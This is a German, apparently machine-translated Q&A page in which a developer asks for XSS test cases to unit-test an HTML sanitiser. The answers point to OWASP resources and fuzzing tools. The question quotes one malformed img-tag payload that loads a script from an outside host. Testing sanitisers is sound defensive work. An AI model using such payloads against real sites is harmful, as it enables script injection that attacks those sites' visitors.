18 Stimmen

JamShady avatar

XSS Torture Test - gibt es das?

Gefragt el 1 de November, 2008
Wann wurde die Frage gestellt
3860 Ansichten
Anzahl der Besuche der Frage
4 Antworten
Anzahl der Fragenantworten
Gelöst
Aktueller Status der Frage

Ich bin auf der Suche nach einem HTML-Sanitiser zu schreiben, und natürlich zu testen/beweisen, dass es richtig funktioniert, brauche ich eine Reihe von XSS-Beispiele, um gegen sie zu sehen, wie es führt zu werfen. Hier ist ein schönes Beispiel aus Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Ich weiß, es gibt eine Mime-Folter-Test die aus mehreren verschachtelten E-Mails mit Anhängen besteht, die zum Testen von Mime-Dekodierern verwendet werden (wenn sie sie richtig dekodieren können, dann haben sie sich als funktionierend erwiesen). Ich bin im Grunde auf der Suche nach einem Äquivalent für XSS, d.h. einer Liste von Beispielen für fragwürdiges HTML, die ich meinem Sanitiser vorwerfen kann, um sicherzustellen, dass er gut funktioniert.

Wenn jemand auch gute Ressourcen hat, wie man den Sanitiser schreibt (z.B. welche gängigen Exploits die Leute versuchen zu benutzen, usw.), wären wir auch dankbar dafür.

Vielen Dank im Voraus :-)

Bearbeiten: Sorry, wenn dies nicht klar war, bevor, aber ich war nach einer Reihe von Folter-Tests, so dass ich Unit-Tests für die Sanitiser schreiben kann, nicht testen Sie es im Browser, etc. Die Quelldaten können theoretisch von überall her kommen - nicht nur von einem Browser.

Gefragt el 1 de November, 2008 von JamShady

Antworten

Zu viele Anzeigen?

18voto

RealHowTo avatar
RealHowTo Punkte 33858

Werfen Sie einen Blick auf diese XSS Cheat List : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Beantwortet el 1 de November, 2008 von RealHowTo (33858 Punkte )

0 Stimmen

Avatar von dbr

Insbesondere das "XML-Format des XSS-Spickzettels", das ich beim ersten Mal, als ich die Seite sah, übersehen hatte.

Kommentiert el 2 de November, 2008 von dbr

7voto

Maxam avatar
Maxam Punkte 4005

XSS Ich ist ein großartiges Firefox-Plugin, das Sie mit Ihrem Sanitizer verwenden können.

Beantwortet el 1 de November, 2008 von Maxam (4005 Punkte )

0 Stimmen

Avatar von Pafjo

Der Link zu "XSS Me" ist falsch formatiert... Die richtige URL lautet addons.mozilla.org/de-US/firefox/addon/7598

Kommentiert el 1 de November, 2008 von Pafjo

0 Stimmen

Avatar von boyd4715

Sie ist veraltet und funktioniert nicht mit der neuesten Version von FireFox

Kommentiert el 21 de Juni, 2011 von boyd4715

2voto

erickson avatar
erickson Punkte 256579

Überprüfen Sie OWASP . Sie bieten eine gute Anleitung, wie XSS funktioniert, worauf man achten muss und sogar die WebGoat Projekt, bei dem Sie sich an einer gefährdeten Website versuchen können.

Beantwortet el 1 de November, 2008 von erickson (256579 Punkte )

2voto

Eric Wendelin avatar
Eric Wendelin Punkte 40906

Sie könnten es mit Jesse Rudermans jsfunfuzz ( http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/ ), die zufällige Daten auf Ihr Javascript wirft, um es zu zerstören. Es scheint, dass das Firefox-Team dies mit großem Erfolg eingesetzt hat.

Beantwortet el 1 de November, 2008 von Eric Wendelin (40906 Punkte )

Verwandte Fragen

Empfohlene Fragen

Top-Tags

CodeJaeger.com

CodeJaeger ist eine Gemeinschaft für Programmierer, die täglich Hilfe erhalten..
Wir haben viele Inhalte, und Sie können auch Ihre eigenen Fragen stellen oder die Fragen anderer Leute lösen.

Powered by:

Yandex
X